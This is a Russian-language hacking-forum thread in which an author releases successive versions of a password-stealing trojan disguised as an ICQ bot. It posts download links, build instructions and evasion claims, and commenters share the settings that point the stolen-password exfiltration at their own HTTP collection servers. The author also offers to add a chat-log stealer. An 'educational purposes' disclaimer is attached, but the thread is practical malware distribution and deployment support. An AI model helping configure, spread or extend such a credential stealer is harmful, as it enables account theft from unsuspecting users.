Итак, приступим. Если кто то постоянно тoрчит на Античате и у него хорошая память, то он помнит что гдето месяца полтора назад я выкладывал троянца, который маскируется под ICQ Бота, а на самом деле ворует пароли (очень нехороший =( ). Примерно в воскресенье я сел с утра и начал писать вторую версию. Закончил я это дело в понедельник =). Эти дни я давал троянца на проверку разным хорошим пиплам, чтобы они нашли и сообщили мне о глюках =), теперь же я выкладываю официальную (гыгы) вторую версию троянца. Нового оччень много, но обо всем попорядку. Что добавлено/исправлено: - Добавлен поиск по винту НЕУСТАНОВЛЕННОГО QIP. - Исправлены глючки с процедурой извлечения паролей (они были и во множетсве = ) ). - Кардинально изменен способ передачи данных. Теперь троян использует не ICQ протокол, а HTTP, а еще конкретнее библиотеку WinInet. Не палится файерами (вроде бы =) ). Антивирями тоже не палится. - Соответственно, если передача теперь по HTTP, То для троя был написан сниффер (его исходник в проекте). - Написан подробный ReadMe.txt =)))) Обращаю внимание, что программа написана в ОБРАЗОВАТЕЛЬНЫХ целях, не стоит реально украдывать ею аськи!!!! Архив с проектом качаем тутс: http://ggg123321.narod.ru/troy.rar Теперб к вопросам компиляции, после релиза первого трояна ICQ и еще одного моего троянца, мою личку зафлудили вопросами о компиляции =))). Объясняю все и всем сразу =). Ничего сложного нет!!! С проектом идет компонент TICQ2003Decrypt (автор не я, автор CobanS), его нужно установить. Далее нужно нажать ctrl-f9, чтобы Делфи скомпилировал троянца без запуска! Дальше можно оптимизировать размер каким нето пакером, но и то это будет приятное, но не обязательное дополнение. ВСЕ!!!!! Это не сложно!!!!! Если же совсем туго, то можно спросить в теме. Это не стыдно, форум для того и создан чтобы делится опытом и знаниями! Потом, у меня перебои с инетом, и я могу ответить не сразу, а в теме же это сделают пусть и дургие люди но оперативно! Авторские права принадлежат прежде всего Antichat.Ru, ну и вашему покорному слуге - А®ТеS'y. Вы можете модифироваь код, это только приветствуется, единственное чего вы не имеет права делать, это КОММЕРЧСКИ распространять программу. __________________ CopyRight Antichat.Ru 2007 year
я качал вируса не обнаружено, ещё бы суметь под себя подстроить=) P.s. СКАЖЕМ ВСЕ СПАСИБО А®Теs!! пока на работоспособность не пробовал , но всётаки
Автору респект!!! Выдирает даже с флешек! . Работает вроде без багов, только дельфи 7 при компиляции какой-то совет дает, а так вроде без подстав канектится на указаный сниффер. Outpost 4 резет. Каспер с доктором вебом с последними базами на момент теста неполили. А что там настраивать там по-моему любой догонит. Там на русским в исходниках написано где и что менять =))) Если не поймёшь стуки в Асю помогу чем смогу P.s. даже я с первого раза все правильно скампилил
Привет. Скачал троя, подключил ICQ2003Decrypt , поменял константы, скомпилил. Проверил - не пашет. возможно пролема в константах. Я их задал в формате: Server_Addr: PChar= 'http://Myserver.122mb.com'; // мой сайт ScriptName: PChar= 'need.php'; // имя скрипта. hdrs: Pchar= 'Content-Type: application/x-www-form-urlencoded'; // Не менял Скрипт лежит в корневой папке, т.е. http://Myserver.122mb.com/need.php Лог файл тоже там. С уважением, bt2mf88a
У меня примерно так и всё работает. Code: [COLOR=Yellow]Server_Addr: PChar= 'Myserver.122mb.com'; ScriptName: PChar= 'need.php'; hdrs: Pchar= 'Content-Type: application/x-www-form-urlencoded';[/COLOR] Посматри может фаер блочит или антивирь? Или ты просто неправильно установил компонент TICQ2003Decrypt. поставь без заглавной буквы . Code: Server_Addr: PChar= '[COLOR=Red]m[/COLOR]yserver.122mb.com';
Всем спасибо, все пашет, ошибка была в подключении Unit.pas Автору respect ;-) tnx P.s. Кстати в лог на серваке все норм пишет, а вот на почту глючный пас присылает...
У меня на все хосты и бесплатные и платные все пашет и на мыло все четко приходит!!! З.ы. мыло Gmail - e.
Слух добвь функцию для Mail.ru Agent а тоже плз, буду очень признателен, никто не знает прогу которая крадётисторию переписка ICQ и агента?
Короче я представляю на ваш суд обновленного троянца, версия 2.01 =). Что добавлено/убрано/изменено: - Незначительно переработан сорец троянца Очень сильно доработан сниффер, теперь там есть: - Запись в лог IP адреса с которого все пришло - Запись в лог Даты/времени прибытия - Теперь есть админка, т.е. без знания логина/пароля лог не посмотришь =). (пароль и логин хранятся ко всему прочему в стойком md5, блин отвлекся =) ) - Внешний вид админки сниффера довольно таки цивильный, т.е. доработка дизайна =) Качаем тута: http://ggg123321.narod.ru/varlok_troy_2.01.rar Опять же напоминаю, что копирайты принадлежат Античату (AntiChat.Ru) и мне (А®ТеS'у), ты не могешь распространять программ коммерчески, доработка кода лишь приветствуется. За незаконное в рамках законодательства твоей страны применение троянца никто, кроме тебя самого ответственности НЕ НЕСЕТ!!! Если будешь пытацца протроянить админов ICQ.com, то можешь сесть по 273 - "Написание и распространение", в остальных случаях тебе грозит лишь посыл на три веселых буквы =)))).
Про мыло агента я думал, может сделаю, переписку украсть невозможно, т.к. она сохраняется на машине пользователя (я так подозреваю что и на icq.com, но это токо мои подозрения =) ). Я даже кстати темку тут на форуме видел, там как раз этот вопрос обсуждали =) з.ы. ептыть до меня токо счас доперло что ты имел ввиду =))), короче мона сделать тырильщик логов общения, это легко =)